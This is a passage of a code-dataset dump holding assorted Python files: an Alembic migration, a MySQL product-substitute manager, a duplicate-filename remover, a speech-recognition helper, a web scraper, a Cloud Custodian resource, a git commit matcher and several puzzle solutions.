sort_by_timestamp(snapshots):\n return list(sorted(snapshots, key=lambda snapshot:snapshot.timestamp))\n\ndef observations_from_log(observables, log_filename):\n snapshots = 
[Snapshot.from_data_dict(json.loads(line)['snapshot']) \\\n for line in file(log_filename).readlines()]\n\n snapshot_log = sorted(snapshots, key=lambda snapshot:snapshot.timestamp)\n observations = compute_observations(observables, flatten_by_timestamp(snapshot_log))\n\n return observations\n \n","repo_name":"kshitijl/camellia-stats","sub_path":"webcomic_stats_scraper/report_generation.py","file_name":"report_generation.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41687538230","text":"\"\"\"empty message\n\nRevision ID: 75d55ff74fef\nRevises: 6e67b963768a\nCreate Date: 2022-03-25 16:24:51.320479\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '75d55ff74fef'\ndown_revision = '6e67b963768a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('status',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=30), nullable=True),\n sa.Column('domain', sa.String(length=30), nullable=True),\n sa.Column('is_default', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('transition',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('from_status_id', sa.Integer(), nullable=False),\n sa.Column('to_status_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['from_status_id'], ['status.id'], ),\n sa.ForeignKeyConstraint(['to_status_id'], ['status.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('level',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('variable_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=30), nullable=False),\n sa.Column('sequence', sa.Integer(), nullable=False),\n sa.Column('description', sa.String(length=200), nullable=True),\n sa.Column('procedure', sa.String(length=200), nullable=True),\n sa.ForeignKeyConstraint(['variable_id'], ['variable.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('experiment_variable',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('experiment_id', sa.Integer(), nullable=False),\n sa.Column('variable_id', sa.Integer(), nullable=False),\n sa.Column('role', sa.String(length=10), nullable=True),\n sa.Column('monday', sa.Boolean(), nullable=True),\n sa.Column('tuesday', sa.Boolean(), nullable=True),\n sa.Column('wednesday', sa.Boolean(), nullable=True),\n sa.Column('thursday', sa.Boolean(), nullable=True),\n sa.Column('friday', sa.Boolean(), nullable=True),\n sa.Column('saturday', sa.Boolean(), nullable=True),\n sa.Column('sunday', sa.Boolean(), nullable=True),\n sa.Column('final', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['experiment_id'], ['experiment.id'], ),\n sa.ForeignKeyConstraint(['variable_id'], ['variable.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('condition_variable',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('condition_id', sa.Integer(), nullable=False),\n sa.Column('experiment_variable_id', sa.Integer(), nullable=False),\n sa.Column('level_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['condition_id'], ['condition.id'], ),\n sa.ForeignKeyConstraint(['experiment_variable_id'], ['experiment_variable.id'], ),\n sa.ForeignKeyConstraint(['level_id'], ['level.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n 
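flatten_by_timestamp above groups measurements with collections.defaultdict(dict), and merge_dicts layers dicts left to right so that later values win. Both idioms in miniature:

```python
import collections

by_ts = collections.defaultdict(dict)
for ts, name, value in [(1, 'a', 10), (1, 'b', 20), (2, 'a', 30)]:
    by_ts[ts][name] = value
assert by_ts[1] == {'a': 10, 'b': 20}

# merge_dicts(d1, d2) behaves like dict unpacking: later dicts win
assert {**{'x': 1}, **{'x': 2, 'y': 3}} == {'x': 2, 'y': 3}
```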
op.create_table('unit',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('condition_id', sa.Integer(), nullable=False),\n sa.Column('code', sa.String(length=10), nullable=True),\n sa.Column('description', sa.String(length=200), nullable=True),\n sa.Column('node_id', sa.Integer(), nullable=True),\n sa.Column('cube_level', sa.String(length=10), nullable=True),\n sa.Column('replicate_no', sa.Integer(), nullable=True),\n sa.Column('row', sa.String(length=1), nullable=True),\n sa.Column('column', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['condition_id'], ['condition.id'], ),\n sa.ForeignKeyConstraint(['node_id'], ['node.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('observation', sa.Column('unit_id', sa.Integer(), nullable=False))\n op.add_column('observation', sa.Column('condition_variable_id', sa.Integer(), nullable=False))\n op.drop_constraint('observation_ibfk_2', 'observation', type_='foreignkey')\n op.create_foreign_key(None, 'observation', 'condition_variable', ['condition_variable_id'], ['id'])\n op.create_foreign_key(None, 'observation', 'unit', ['unit_id'], ['id'])\n op.drop_column('observation', 'variable_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('observation', sa.Column('variable_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=False))\n op.drop_constraint(None, 'observation', type_='foreignkey')\n op.drop_constraint(None, 'observation', type_='foreignkey')\n op.create_foreign_key('observation_ibfk_2', 'observation', 'variable', ['variable_id'], ['id'])\n op.drop_column('observation', 'condition_variable_id')\n op.drop_column('observation', 'unit_id')\n op.drop_table('unit')\n op.drop_table('condition_variable')\n op.drop_table('experiment_variable')\n op.drop_table('level')\n op.drop_table('transition')\n op.drop_table('status')\n # ### end Alembic commands ###\n","repo_name":"Dandelion-dev-team/dandelion","sub_path":"Flask/migrations/versions/75d55ff74fef_.py","file_name":"75d55ff74fef_.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"40670621566","text":"def solution(triangle):\n answer = [triangle[0]]\n for i in range(1, len(triangle)):\n arr = []\n for j in range(len(triangle[i])):\n flag = False\n if j == 0:\n arr.append(triangle[i][j] + answer[i - 1][j])\n elif j == len(triangle[i - 1]):\n arr.append(triangle[i][j] + answer[i - 1][j - 1]) \n else:\n arr.append(triangle[i][j] + max(answer[i - 1][j - 1], answer[i - 1][j])) \n answer.append(arr)\n \n return max(answer[-1])","repo_name":"REXIANN/AlgorithmSolving","sub_path":"programmers/정수삼각형.py","file_name":"정수삼각형.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"5619324297","text":"from copy import deepcopy\nfrom os import remove as os_remove\n\nfrom src.config import Config\nfrom src.file import File\nfrom src.prompt import prompt_samename\n\ndef run_samename(target: dict[str, File], dir: dict[str, File], conf: Config) -> tuple[dict[str, File], dict[str, File]]:\n analyze_samename_all(target, dir)\n new_target = deepcopy(target)\n for fullname, file in target.items():\n if not file.state_flags[5]:\n continue\n if not prompt_samename(fullname, file.ref_file):\n continue\n solve_samename(target, dir, file, fullname)\n new_target.pop(fullname)\n target = 
new_target\n\n new_dir = deepcopy(dir)\n for fullname, file in dir.items():\n if not file.state_flags[5]:\n continue\n if not prompt_samename(fullname, file.ref_file):\n continue\n solve_samename(target, dir, file, fullname)\n new_dir.pop(fullname)\n dir = new_dir\n\n return new_target, new_dir\n\ndef solve_samename(target: dict[str, File], dir: dict[str, File], file: File, file_fullname: str) -> None:\n os_remove(file_fullname)\n for tfile in target.values():\n if tfile.ref_file == file_fullname:\n tfile.ref_file = file.ref_file\n for dfile in dir.values():\n if dfile.ref_file == file_fullname:\n dfile.ref_file = file.ref_file\n\ndef analyze_samename_all(target: dict[str, File], dir: dict[str, File]):\n for fullpath1, tfile in target.items():\n for dfullname, dfile in dir.items():\n analyze_samename(tfile, dfile, fullpath1, dfullname)\n for fullpath2, t2file in target.items():\n if fullpath1 != fullpath2:\n analyze_samename(tfile, t2file, fullpath1, fullpath2)\n\ndef analyze_samename(file1: File, file2: File, file1_fullname: str, file2_fullname: str):\n if file1.name == file2.name:\n if file2.mtime <= file1.mtime:\n file2.state_flags[5] = True\n file2.ref_file = file1_fullname\n else:\n file1.state_flags[5] = True\n file1.ref_file = file2_fullname\n","repo_name":"MortonPL/Caduceus","sub_path":"src/mode/samename.py","file_name":"samename.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14930197083","text":"import time\nimport speech_recognition as sr\n\ndef recognizeVoice():\n output = \"\"\n def callback(recognizer, audio):\n try:\n output = recognizer.recognize_google(audio)\n print(output)\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand audio\")\n output = \"\"\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n output = \"\"\n if \"athena\" in output or \"athina\" in output:\n output = output.replace(\"athena\", \"\")\n output = output.replace(\"athina\", \"\")\n return output\n\n r = sr.Recognizer()\n m = sr.Microphone()\n with m as source:\n r.adjust_for_ambient_noise(source) #calibrates for background audio\n print(\"Listening...\")\n stop_listening = r.listen_in_background(m, callback)\n for i in range(50): \n time.sleep(0.1)\n stop_listening(wait_for_stop=False)","repo_name":"Acrylami/CodeClubAssistant","sub_path":"voiceRecognition.py","file_name":"voiceRecognition.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"27614590808","text":"\"\"\"\nID: happyn61\nLANG: PYTHON3\nPROB: loan\n\"\"\"\nfrom itertools import product\nimport itertools\nimport math\n#from collections import defaultdict\nimport sys\nimport heapq\nfrom collections import deque\nMOD=1000000000007\n#fin = open ('loan.in', 'r')\n#fout = open ('loan.out', 'w')\n#print(dic[\"4734\"])\ndef find(parent,i):\n\n\n if parent[i] != i: \n parent[i]=find(parent,parent[i]) \n return parent[i] \n\n # A utility function to do union of two subsets \ndef union(parent,rank,xx,yy): \n x=find(parent,xx)\n y=find(parent,yy)\n if rank[x]>rank[y]:\n parent[y]=x\n elif rank[y]>rank[x]:\n parent[x]=y\n else:\n parent[y]=x\n 
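In the voiceRecognition record above, the assignments to output inside callback bind a new local variable, so the output initialized in recognizeVoice is never updated (and listen_in_background discards callback's return value anyway). Python's nonlocal keyword is the usual fix; a minimal sketch of the closure pattern:

```python
def make_listener():
    transcript = ''

    def callback(text):
        nonlocal transcript          # rebind the enclosing variable
        transcript = text

    callback('athena hello')
    return transcript

assert make_listener() == 'athena hello'
```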
rank[x]+=1\nans=0\n#NK=sys.stdin.readline().strip().split()\nK=int(sys.stdin.readline().strip())\n#N=int(NK[0])\n#K=int(NK[1])\n#M=int(NK[2])\n#ol=list(map(int,sys.stdin.readline().strip().split()))\n#d={0:0,1:0}\n\nx=0\ny=0\n\n#d={\"N\":(0,1),\"S\":(0,-1),\"W\":(-1,0),\"E\":(1,0)}\nfor _ in range(K):\n #a=int(sys.stdin.readline().strip())\n n,a,b=list(map(int,sys.stdin.readline().strip().split()))\n l=list(sys.stdin.readline().strip())\n if b==0:\n print(n*a)\n elif b>0:\n print(n*a+b*n)\n else:\n stack=[]\n for c in l:\n if len(stack)==0 or stack[-1][0]!=c:\n stack.append([c,1])\n elif stack[-1][0]==c:\n stack[-1][1]+=1\n p=0\n q=0\n for i,j in stack:\n if i==\"0\":\n p+=1\n else:\n q+=1\n k=min(p,q)+1\n print(n*a+k*b)\n","repo_name":"happyn6s1/USACO","sub_path":"python/1550B.py","file_name":"1550B.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74020385646","text":"'''\nencoding:utf-8\nauthor:yh\ndate:2023/3/20 10:41\n'''\nimport requests\nfrom lxml import etree\nimport time\n\nurl = \"http://www.xiyi.edu.cn/gzcylist.jsp\"\n# url=\"http://www.xiyi.edu.cn/gzcylist.jsp?totalpage=101&PAGENUM=1&urltype=tree.TreeTempUrl&wbtreeid=1172\"\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41'}\npagenum = 1\n\nparams = {\n \"totalpage\": 101,\n \"PAGENUM\": pagenum, # 设置分页\n \"urltype\": \"tree.TreeTempUrl\",\n \"wbtreeid\": 1172\n}\n# html = requests.get(url, headers=headers)\nhtml = requests.get(url, headers=headers, params=params)\nhtml.encoding = \"utf-8\"\n# print(html.text)\n\nselectors = etree.HTML(html.text)\n\n# 浏览器会对html文本进行一定的规范化,所以会自动在路径中加入tbody,导致读取失败,在此处直接在路径中去除tbody即可。 \n# trackingCode = selectors.xpath(\"//*[@class='content']/table[1]/tr[2]/td[2]/text()\")[0]\n# title = selectors.xpath(\"//tr[2]/td[3]/a/text()\")[0]\n# submitTime = selectors.xpath(\"//tr[2]/td[4]/text()\")[0]\n# resolveTime = selectors.xpath(\"//tr[2]/td[5]/text()\")[0]\n# s = str(trackingCode) + ',' + str(title) + ',' + str(submitTime) + ',' + str(resolveTime)\n# s = s.replace(\" \", \"\").strip().replace(\"\\n\", \"\")\n# print(s)\n\nf = open(\"XiaoZhangXinXiang.csv\", \"a\", encoding=\"utf-8\")\nf.write(\"查询码,标题,提交时间,处理状态\\n\")\ni = 2\nwhile True:\n try:\n trackingCode = selectors.xpath(\"//*[@class='content']/table[1]/tr[\" + str(i) + \"]/td[2]/text()\")[0]\n title = selectors.xpath(\"//tr[\" + str(i) + \"]/td[3]/a/text()\")[0]\n submitTime = selectors.xpath(\"//tr[\" + str(i) + \"]/td[4]/text()\")[0]\n resolveTime = selectors.xpath(\"//tr[\" + str(i) + \"]/td[5]/text()\")[0]\n except:\n break\n\n s = str(trackingCode) + ',' + str(title) + ',' + str(submitTime) + ',' + str(resolveTime)\n s = s.replace(\" \", \"\").strip().replace(\"\\n\", \"\")\n print(i - 1, s)\n i += 1\n f.write(s + \"\\n\")\n\nf.close()\n","repo_name":"Asucanyh-cn/pythonProject","sub_path":"pyProject2023/chapter4/xiaozhangxinxiang.py","file_name":"xiaozhangxinxiang.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21925738369","text":"from c7n_azure.provider import resources\nfrom c7n_azure.resources.arm import ArmResourceManager\n\n\n@resources.register('routetable')\nclass RouteTable(ArmResourceManager):\n \"\"\"Route Table Resource\n\n :example:\n\n Finds all Route Tables in the subscription.\n\n .. 
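The find/union helpers above implement union by rank with path compression. A small usage sketch (with an early return added for the case where both elements already share a root):

```python
def find(parent, i):
    if parent[i] != i:
        parent[i] = find(parent, parent[i])   # path compression
    return parent[i]

def union(parent, rank, a, b):
    x, y = find(parent, a), find(parent, b)
    if x == y:
        return                                # already in the same set
    if rank[x] < rank[y]:
        x, y = y, x
    parent[y] = x
    if rank[x] == rank[y]:
        rank[x] += 1

parent = list(range(5))
rank = [0] * 5
union(parent, rank, 0, 1)
union(parent, rank, 1, 2)
assert find(parent, 2) == find(parent, 0)
assert find(parent, 3) != find(parent, 0)
```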
code-block:: yaml\n\n policies:\n - name: find-all-route-tables\n resource: azure.routetable\n\n \"\"\"\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Networking']\n\n service = 'azure.mgmt.network'\n client = 'NetworkManagementClient'\n enum_spec = ('route_tables', 'list_all', None)\n default_report_fields = (\n 'name',\n 'location',\n 'resourceGroup',\n 'properties.subnets[].id'\n )\n resource_type = 'Microsoft.Network/routeTables'\n","repo_name":"harsh4870/cloud-custodian","sub_path":"cloud-custodian/tools/c7n_azure/c7n_azure/resources/route_table.py","file_name":"route_table.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"8595529540","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"This module manage all the dialogue with in MySQL.\"\"\"\n\nfrom datetime import datetime\nimport mysql.connector\n\nfrom database_xchange.config import info_bdd\n\n\nclass DataMgt:\n \"\"\"Management of all SQL request.\"\"\"\n\n def __init__(self):\n self.selected_prod = ()\n self.product_origin = ()\n self.product_substitute = ()\n self.my_database = mysql.connector.connect(**info_bdd)\n self.my_cursor = self.my_database.cursor()\n self.category_selected = ()\n self.myresult_1 = None\n self.myresult_0 = None\n\n def get_all_cat(self):\n \"\"\"retrieve all categories.\"\"\"\n\n self.my_cursor.execute(\"SELECT id_category, name FROM Categories\")\n self.myresult_0 = self.my_cursor.fetchall()\n return self.myresult_0\n\n def get_prod_by_category(self, category_selected):\n \"\"\"retrieve product by category.\"\"\"\n\n query = (\"SELECT id_product, name, brand, id_category, nutriscore,\"\n \" description, store FROM Products \"\n \"WHERE id_category = %s ORDER BY name\")\n self.my_cursor.execute(query, (category_selected,))\n myresult = self.my_cursor.fetchall()\n return myresult\n\n def get_one_prod(self, id_product):\n \"\"\"retrieve a product and all the information associated with the\n id_product input.\"\"\"\n\n query = (\"name, brand, id_category, nutriscore,\"\n \" description, store FROM Products \"\n \"WHERE id_product = %s\")\n self.my_cursor.execute(query, (id_product,))\n myresult = self.my_cursor.fetchall()\n return myresult\n\n def save_substitute(self, product_origin, product_substitute):\n \"\"\"save substitute product in database.\"\"\"\n\n date_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n self.my_database = mysql.connector.connect(**info_bdd)\n self.my_cursor = self.my_database.cursor()\n query = (\n \"INSERT INTO Favorites (id_product_origin, id_product_substitute,\"\n \" request_date) \"\n \"VALUES (%s, %s, %s)\"\n )\n data = (product_origin[0], product_substitute[0], date_time)\n self.my_cursor.execute(query, data)\n self.my_database.commit()\n\n def get_all_favorites(self):\n \"\"\"retrieve all substitutes products saved in database.\"\"\"\n\n self.my_cursor.execute(\n \"SELECT id_favorite, name, nutriscore, request_date\"\n \" FROM Products\"\n \" INNER JOIN favorites ON \"\n \"products.id_product = favorites.id_product_substitute\"\n \" UNION\"\n \" SELECT id_favorite, name, nutriscore, request_date\"\n \" FROM Products\"\n \" INNER JOIN favorites ON \"\n \"products.id_product = favorites.id_product_origin\"\n \" ORDER BY id_favorite DESC\")\n self.myresult_0 = self.my_cursor.fetchall()\n self.myresult_1 = [self.myresult_0[i] + self.myresult_0[i+1] for i in range(0, len(self.myresult_0), 2)]\n return self.myresult_1\n\n def 
suggest_substitute(self, product_origin):\n \"\"\"suggest a substitute with a better nutriscore than the product\n selected by the user.\"\"\"\n\n query1 = (\"SELECT id_product, name, description, store, url, brand,\"\n \" nutriscore FROM Products \"\n \"WHERE id_category = %s AND nutriscore < %s\")\n self.my_cursor.execute(query1, (product_origin[3], product_origin[4],))\n myresult = self.my_cursor.fetchall()\n if not myresult:\n query2 = (\"SELECT id_product, name, description, store, url,\"\n \" brand, nutriscore FROM Products \"\n \"WHERE id_category = %s AND nutriscore = %s\")\n self.my_cursor.execute(\n query2, (product_origin[3], product_origin[4],))\n myresult = self.my_cursor.fetchall()\n return myresult\n\n def is_database_empty(self):\n \"\"\"test if Table product is empty.\"\"\"\n\n query = (\"SELECT 1 FROM Products LIMIT 1\")\n self.my_cursor.execute(query)\n content = self.my_cursor.fetchall()\n return content\n\n\"\"\"\nfrom datetime import datetime\nimport mysql.connector\n\nfrom database_xchange.config import info_bdd\n\n\nclass BaseManager:\n\n def __init__(self, db):\n self.db = db # db is also my_database with mysql-connector\n self.my_cursor = self.my_database.cursor()\n self.myresult = None\n\nclass CategoryManager(BaseManager):\n # management of \n\n def __init__(self, db):\n super().__init__(db)\n\n def get_all(self):\n # get all categories\n\n self.my_cursor.execute(\"SELECT id_category, name FROM Categories\")\n self.myresult = self.my_cursor.fetchall()\n return self.myresult\n\nclass ProductManager(BaseManager):\n # management of \n\n def __init__(self, db):\n super().__init__(db)\n pass\n\n\n def create_from_api(self):\n pass\n\n def create_from_database(self):\n pass\n\n def get_product_by_id(self, id_product):\n pass\n\n def get_all(self):\n pass\n\n def get_all_by_category(self, category):\n pass\n\n def get_all_by_nutriscore(self, nutriscore):\n pass\n\n def get_substitutes(self, product_origin):\n pass\n\n\nclass FavoriteManager(BaseManager):\n\n def __init__(self, db):\n super().__init__(db)\n\n def get_all(self):\n pass\n\n def save_substitute(self, product_origin, product_substitute):\n pass\n\"\"\"","repo_name":"SonyTison/PureBeurreApp","sub_path":"database_xchange/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16315915707","text":"# https://leetcode.com/problems/largest-3-same-digit-number-in-string/\n\nclass Solution:\n def largestGoodInteger(self, num: str) -> str:\n result = ''\n segment = ''\n for digit in num:\n if not segment or segment[-1] == digit:\n segment += digit\n else:\n if len(segment) >= 3:\n segment = segment[:3]\n if not result or int(segment) > int(result):\n result = segment\n segment = digit\n if len(segment) >= 3:\n segment = segment[:3]\n if not result or int(segment) > int(result):\n result = segment\n return result\n","repo_name":"sometastycake/leetcode","sub_path":"strings/easy/largest-3-same-digit-number-in-string.py","file_name":"largest-3-same-digit-number-in-string.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"29618522363","text":"def uses_only(word,available):\n for letter in word:\n if letter not in available:\n return False\n return True\n\nfin = open('words.txt')\nfor letter in fin:\n word = letter.strip()\n if uses_only(word,'acefhlo'):\n 
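largestGoodInteger above tracks runs of equal digits and compares candidates as integers. Because every candidate is exactly three characters, plain string comparison orders them the same way, so a direct three-character window scan also works:

```python
def largest_good_integer(num: str) -> str:
    best = ''
    for i in range(len(num) - 2):
        if num[i] == num[i + 1] == num[i + 2]:
            best = max(best, num[i] * 3)      # '999' > '000' as strings
    return best

assert largest_good_integer('6777133339') == '777'
assert largest_good_integer('2300019') == '000'
assert largest_good_integer('42352338') == ''
```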
print(word)","repo_name":"CivilizedWork/Whisper-Jhin","sub_path":"day9/Exercise9.4.py","file_name":"Exercise9.4.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4435662428","text":"\"\"\"Matchers for merge diff analysis\n\"\"\"\n\nfrom typing import List\nfrom hashlib import sha1\n\nfrom pydantic import BaseModel\n\nfrom gitaudit.git.change_log_entry import ChangeLogEntry\nfrom gitaudit.branch.hierarchy import sha_to_entry_map\n\n\nclass MatchResult(BaseModel):\n \"\"\"Match Result consisting of head, base, and confidence entries\"\"\"\n\n head: ChangeLogEntry\n base: ChangeLogEntry\n\n\nclass Matcher:\n \"\"\"Generic class for matching commits\"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Hier List\n base (List[ChangeLogEntry]): Base Hier List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n raise NotImplementedError\n\n\nclass SameCommitMatcher(Matcher):\n \"\"\"Accounts for branching strategies where dev and master branches are regularly cross merged.\n\n In very rare occasions it can happen that a feature branch was created before branch off\n and then can be merged into both branches that are to be matched with different merge commits.\n\n All matches will have an ABSOLUTE confidence level.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n matches = []\n\n for sha, head_entry in entry_head_map.items():\n if sha in entry_base_map:\n matches.append(\n MatchResult(\n head=head_entry,\n base=entry_base_map[sha],\n )\n )\n\n return matches\n\n\nclass DirectCherryPickMatcher(Matcher):\n \"\"\"If a cherry pick was done with the -x option the commit message will have a\n (cherry picked from commit ) message in the commit body. 
This sha can be used for matching.\n\n The cherry pick matcher will match in both directions (head <-> base) as it can happen that in a\n project the bugfix has to be done quickly in release and is then cherry picked to main later.\n\n All matches will have an ABSOLUTE confidence level.\n \"\"\"\n\n def __init__(self, head_to_base: bool = True, base_to_head: bool = True) -> None:\n \"\"\"Constructor\n\n Args:\n head_to_base (bool): Head commit was cherry picked with -x from base\n base_to_head (bool): Base commit was cherry picked with -x from head\n \"\"\"\n super().__init__()\n\n self.head_to_base = head_to_base\n self.base_to_head = base_to_head\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n matches = []\n\n if self.head_to_base:\n for head_entry in entry_head_map.values():\n if not head_entry.cherry_pick_sha:\n continue\n\n if head_entry.cherry_pick_sha in entry_base_map:\n matches.append(\n MatchResult(\n head=head_entry,\n base=entry_base_map[head_entry.cherry_pick_sha],\n )\n )\n\n if self.base_to_head:\n for base_entry in entry_base_map.values():\n if not base_entry.cherry_pick_sha:\n continue\n\n if base_entry.cherry_pick_sha in entry_head_map:\n matches.append(\n MatchResult(\n head=entry_head_map[base_entry.cherry_pick_sha],\n base=base_entry,\n )\n )\n\n return matches\n\n\nclass ThirdPartyCherryPickMatcher(Matcher):\n \"\"\"It can happen that a bug fix was created on master and then is cherry picked with -x option\n to release and hotfix branch. If a matching between release and hotfix is made the sha in the\n commit messase (cherry picked from commit ) will point to a third party commit unrelated\n to the branches under comparison.\n\n All matches will have an ABSOLUTE confidence level.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n matches = []\n\n cherry_picked_from_head_map = {\n x.cherry_pick_sha: x\n for x in filter(\n lambda entry: entry.cherry_pick_sha,\n entry_head_map.values(),\n )\n }\n cherry_picked_from_base_map = {\n x.cherry_pick_sha: x\n for x in filter(\n lambda entry: entry.cherry_pick_sha,\n entry_base_map.values(),\n )\n }\n\n for cp_sha, head_entry in cherry_picked_from_head_map.items():\n if cp_sha not in cherry_picked_from_base_map:\n continue\n\n matches.append(\n MatchResult(\n head=head_entry,\n base=cherry_picked_from_base_map[cp_sha],\n )\n )\n\n return matches\n\n\ndef numstat_to_sha1(entry: ChangeLogEntry, with_additions_deletions=True):\n \"\"\"Calculates a sha1 hash out of the numstat file changes\n\n Args:\n entry (ChangeLogEntry): Change Log Entry\n with_additions_deletions (bool, optional): Whether additions and deletions shall be\n accounted for. 
Defaults to True.\n\n Returns:\n str: sha1 hash\n \"\"\"\n if with_additions_deletions:\n file_add_del_texts = map(\n lambda x: f\"{x.path}({x.additions}|{x.deletions})\",\n entry.sorted_numstat,\n )\n else:\n file_add_del_texts = map(\n lambda x: x.path,\n entry.sorted_numstat,\n )\n return sha1(\"\".join(file_add_del_texts).encode(\"utf-8\")).hexdigest()\n\n\ndef create_numstat_map(\n entries: List[ChangeLogEntry],\n with_additions_deletions: bool,\n ignore_merge_commits: bool,\n):\n \"\"\"Creates a numstat sha1 to change log entry map that can be used for commit matching\n\n Args:\n entries (List[ChangeLogEntry]): List of change log entries\n with_additions_deletions (bool): Whether additions / deletions shall be accounted\n for in the map generation.\n ignore_merge_commits (bool): Ignore merge commits removes duplicate entries if a merge\n commit came from one single commit on a branch.\n\n Returns:\n Dict[str, ChangeLogEntry]: Numstat sha1 to ChangeLogEntry map\n \"\"\"\n numstat_map = {}\n ignore_entries = []\n\n for entry in entries:\n if not entry.numstat:\n continue\n\n if ignore_merge_commits and len(entry.parent_shas) > 1:\n continue\n\n stat_sha1 = numstat_to_sha1(entry, with_additions_deletions)\n\n if stat_sha1 in ignore_entries:\n continue\n\n if stat_sha1 in numstat_map:\n numstat_map.pop(stat_sha1)\n ignore_entries.append(stat_sha1)\n continue\n\n numstat_map[stat_sha1] = entry\n\n return numstat_map\n\n\nclass FilesChangedMatcher(Matcher):\n \"\"\"In case a cherry pick was NOT done with the -x option enabled an exact matching is not\n possible. But if a cherry pick was done successfully, the files changed in both commits shall\n be the exact same. Therefore, the changes files withing a commit can be used to determine\n if two commits are equal.\n\n All matches will have a STRONG confidence level. If there are multiple matches the additions and\n deletions will be used to filter false positives (note that additions and deletions check is\n done for all matches automatically to proove confidence). 
